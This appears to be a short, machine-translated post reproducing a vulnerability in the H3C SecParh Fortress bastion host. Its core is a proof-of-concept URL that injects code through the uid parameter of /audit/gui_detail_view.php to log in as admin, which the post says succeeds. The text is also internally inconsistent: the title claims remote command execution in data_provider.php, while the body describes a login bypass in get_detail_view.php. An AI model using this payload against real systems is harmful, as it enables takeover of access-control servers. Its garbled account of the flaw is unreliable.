H3c Secparh Fortress Data_provider Php Remote Command Execution Vulnerability
H3c Secparh Fortress Data_provider Php Remote Command Execution Vulnerability
H3C SecParh Fortress data_provider.php remote command execution vulnerability
Vulnerability Description
H3C SecParh Fortress get_detail_view.php There is a vulnerability to log in to any user
Similar to the loopholes that appeared in the Qizhi Fortress
Vulnerability Impact
H3C SecParh Fortress
Network surveying and mapping
Vulnerability reappears
The login page is as follows
The URL of POC verification is
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
Successfully obtained admin permissions
##
This post is licensed under CC BY 4.0 by the author.